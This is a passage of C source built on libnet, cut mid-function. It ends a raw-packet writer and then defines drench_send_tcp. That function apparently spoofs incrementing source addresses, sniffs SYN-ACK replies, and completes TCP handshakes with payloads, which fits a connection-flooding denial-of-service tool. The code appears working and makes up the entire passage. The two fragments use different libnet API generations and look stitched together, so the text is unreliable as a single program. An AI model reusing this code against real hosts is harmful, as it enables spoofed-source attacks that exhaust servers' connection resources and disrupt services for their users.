c = libnet_insert_ipo(&ipopt, /* pointer to ipopt struct */
option_s, /* Length of option list */
buf); /* Packet header memory */
if (c == -1)
{
fprintf(stderr, "Can't add options, discarding them.\n");
}
/*
* Write the packet to the network.
*/
c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H + payload_s
+ option_s);
if (c < LIBNET_TCP_H + LIBNET_IP_H + payload_s + option_s)
{
fprintf(stderr, "libnet_write_ip: %s\n", strerror(errno));
}
printf("Completed, wrote %d bytes\n", c);
free(buf);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
void
drench_send_tcp(pkt_t *dp, u_int8_t offset, u_char *pkt)
{
struct ether_header *eh = NULL;
struct ip *ih = NULL;
struct tcphdr *th = NULL;
char *state = NULL;
in_port_t sport = 0;
size_t paylen = 0;
u_int32_t isn = 0;
if (dp->payload != NULL)
paylen = strlen(dp->payload);
state = TCP_PHASE(dp->flags, "S", "A");
if (pkt != NULL) {
eh = (struct ether_header *)pkt;
ih = (struct ip *)(pkt + sizeof(struct ether_header));
th = (struct tcphdr *)(pkt + sizeof(struct ether_header) + sizeof(struct ip));
isn = th->th_ack;
sport = th->th_dport;
}
else {
sport = libnet_get_prand(LIBNET_PRu16);
}
/* Sanity check: check the ack number of the packet to
* make sure we sent it. We can do this by performing
* a calculation on the sequence number we
* send, based on a "secret" random number */
if (check_isn(dp, sport, &isn) < 0) {
(void)fprintf(stdout,
"(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u INVALID ISN in ACK%s [isn = %u]\n",
state,
TCP_PHASE(
dp->flags,
dp->saddr,
libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE)
),
sport,
TCP_PHASE(
dp->flags,
dp->daddr,
libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE)
),
dp->dport,
(dp->opts & O_CHKISN ? ", DROPPING PACKET" : ""),
isn);
if (dp->opts & O_CHKISN)
return;
}
LIBNET_ERR(dp->p_tcp = libnet_build_tcp(
TCP_PHASE(dp->flags, sport, th->th_dport), /* Source port */
dp->dport, /* Destination port */
TCP_PHASE(dp->flags, isn, (th->th_ack + paylen)), /* ISN */
/* Sniffed packet's seq num */
TCP_PHASE(dp->flags, 0, (th->th_seq + 1)), /* ACK */
TCP_PHASE(dp->flags, dp->flags, dp->flags /*| TH_PUSH*/), /* Control flags */
dp->winsize, /* window size */
0, /* auto checksum */
0, /* Urgent data pointer */
TCP_PHASE(dp->flags, LIBNET_TCP_H, LIBNET_TCP_H + paylen), /* total packet length */
TCP_PHASE(dp->flags, NULL, (u_char *)dp->payload), /* payload */
TCP_PHASE(dp->flags, 0, paylen), /* payload size */
dp->l, /* libnet context */
dp->p_tcp /* ptag */
));
LIBNET_ERR(dp->p_ip = libnet_build_ipv4(
TCP_PHASE(dp->flags, LIBNET_IPV4_H + LIBNET_TCP_H, LIBNET_IPV4_H + LIBNET_TCP_H + paylen),
TCP_PHASE(dp->flags, 0, IPTOS_LOWDELAY), /* TOS */
libnet_get_prand(LIBNET_PRu16),
0, /* Frag */
MAX_TTL, /* TTL */
IPPROTO_TCP, /* Protocol */
0, /* auto checksum */
TCP_PHASE(dp->flags, htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset),
ih->ip_dst.s_addr), /* XXX error check, source */
TCP_PHASE(dp->flags, libnet_name2addr4(dp->l, dp->daddr, LIBNET_DONT_RESOLVE),
ih->ip_src.s_addr), /* XXX error check, destination */
NULL, /* payload */
0, /* payload size */
dp->l, /* libnet context */
dp->p_ip /* libnet ptag */
));
if (libnet_write(dp->l) == -1)
state = "x";
(void)fprintf(stdout, "(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u\n", state,
TCP_PHASE(
dp->flags,
libnet_addr2name4(
htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset),
LIBNET_DONT_RESOLVE
),
libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE)
),
sport,
TCP_PHASE(
dp->flags,
dp->daddr,
libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE)
),
dp->dport);
(void)fflush(stdout);
}
